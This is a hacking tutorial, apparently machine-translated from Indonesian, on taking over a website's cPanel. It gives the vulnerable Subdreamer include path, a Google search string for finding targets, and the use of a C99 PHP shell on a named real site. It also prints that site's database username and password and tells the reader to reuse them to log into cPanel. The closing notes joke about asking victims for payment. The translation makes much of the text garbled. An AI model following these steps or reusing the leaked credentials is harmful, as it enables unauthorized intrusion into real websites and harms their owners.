CPANEL WITH C99

Hacking Cpanel With C99

=================================================================

Is Cpanel it? Cpanel is a center of web site management, or a fancy term CPanel Control Panel is where web admin to do a full setting and control of the web to be created or the term is cpanel = The house is still empty yet nothing, well that's where it later will be filled furnishings to complement the contents of the home, as well as the same Cpanel, and furniture can be categorized as web scripts, script mail, MySql script, etc.. Is it so important cpanel and valuable? yups good question the answer is YES, because if cPanel in a Web could be penetrated by hackers, it can be ascertained that the target web are in control of the hacker [sorry I'm not a hacker J] or when dilogikakan same house when we succeed in kuasain others then certainly the other person could enter at any time to our home. but if other people easy home we can get our house while our house there is a safety that is KEY, yups same as cpanel is not as easy as we imagine due to enter the key areas requiring cpanel username and password, if not then you certainly will not be able to log into the cpanel. Our logic is clear enough to think, so now back to the subject matter, the author will explain takeover targets using cpanel web to errors of logic programming and script errors from the web admin, J

btw we start I'm going to grab a bug in the php script with brands 'subdreamer' [could diliat inwww.subdreamer.com ], there is a bug: / skins/advanced/advanced2.php? pluginpath [0] = with file the problem is advanced2.php, we will try to find the target with his uncle google.com using the syntax: inurl: 'skins/advanced/advanced1.php?', the authors take the example of overseas sites [previously been members announcing their mail to the appropriate bug with ethical hackers] J namely: http://www.cafesjakie.nl

We try to penetrate the target site, using phpshell it will get results It appears it will be the result as below:

Ok's we managed to get in through the back [backdoor] but we have not got access to the main [cpanel] can only be entered through the back door, so we try to find where is the main access [cpanel], note one by one existing file, we can see in the above file phpshell us

That the target is in a position safe-mode: OFF, and there we can see uid: 65534 (nobody) gid = 65534 (nobody) groups = 65534 (nobody) with user: gbremmer, good a good start for us trying to find access cpanel on the target web [if not understand the uid, gid, groups can learn the OS is based on open source like Linux, I love linux], further there is a note in the file / home / gremmer / public_html / skins / advanced, we will try gain access to cpanel try entering the main web page of the target, click the public_html folder or if you are a web admin, public_html folder = www, it will get the results below:

Pay careful attention to these folders, we would think that the logic to connect the database requires a username and password, both of which are usually lies in the config.php file, configuration.php, koneksi.php [depending on the script maker], the authors try we will click on the folder includes [usually the default location in the script subdreamer config.php is in the includes folder], then it will get the results:

Notice that there is 2 file config.php and config.php.new, btw we can see his 2nd, only difference is his problem byte [config.php.new only possible to update only], click config.php it will get the results:

Blah noticed again in the config.php file we can see the complete user databse with passwornya, Just here we will not enter into the database as we will try to get the main access cpanel web targets, look carefully at $ dbname = gbremmer_subdreamer

$ Dbusername = gbremmer_subdrea, so logically gbremmer is the name of the user and behind it is the default name of the hosting, and note once again dbpassword $ file = hiervomgb, is from the user's password to log into the target web databases, stop, question whether we can enter the target cpanel? good question, here the author will take you to think logically, do you ever feel safe to do activities in the virtual world [internet]? To the layman this is probably a stupid question, maybe people would think it would be safe and comfortable for the internet world affairs [nearly 80% who said so, so as to affairs password only one password for many purposes] J, because we think so then where lies fault of our own [do not ever want to know for security affairs in the internet], so back to the root of the problem, we would think the reverse of most laymen, we will try to use user name: gbremmer and password: hiervomgb to gain access from the main targets cpanel The.

Let's open the URL: http://www.cafesjakie.nl/cpanel , see cpanel page protected by a user name and password,

Confused right? J, we will try to enter the username and password that we can from the config.php file

Blar liatlah we can enter the target cpanel, can perform full admin control terhadapa is only to capitalize logic without having to laboriously J for wearing an error of logic programming and script from the admin [but also one of the writers on the web admin www.sekuritionline. net ]

Note: 
- Learning to be a hacker is something fun that is the ethics of his hard-- When successfully entered the target web to try to let them know the relevant parties in order to do the patch on the web [all requested donations via e-gold] J xixixixiix 
- Make hacking is art not to destroy [except if cornered] J just kidding J 
- Keep to ourselves that for cyber affairs ga guarantees pure 100% safe, so remember the motto SO xixi team [Nothing Secure in the world or in the world is not there is a safe choice, in the sky there is heaven] J 
- Make learning for its web admin when hit in contact Deface ga have to report to the authorities [Myspace instead ngeluarin much money JJJ 
- For admins always do the update patch automatically or manually, and do web data backup teraturJ] we should be grateful that we are reminded by the web hackers, [instead of getting angry - angry and say on TV-TV] that the web that cost over 200 million could be said to be safe [author also loh Myspace web admin on protest ]

Greatz: God that gives life and my death, My heart Erniku love [official uda so wife] hope a speedy recovery I want to have a baby neh J, SO counterparts in te @ m, Bastard Crew, adhietslank, thesims, fabricate, Jayoes, a -tech, jantap, babypunk, Lt., k1n9kong, faithful, stove ^ meleduk, kabrut, saleho [rahmad pious], pomponk, blindboy, dave, Sonix, ariee, tommy ^ singers, Orgil, Hilda ^ inside, Rini, or the ga could mention one by one [thank all who participated in the summit digaht SO], all people underground, channel Hacker, Cracker, Carder, who is in DALnet, mildnet, realunix, thanks on learning J

No Greatz: The corruption that made our nation suffer.

The author is not only a happy hacker / hobbyist to world affairs underground J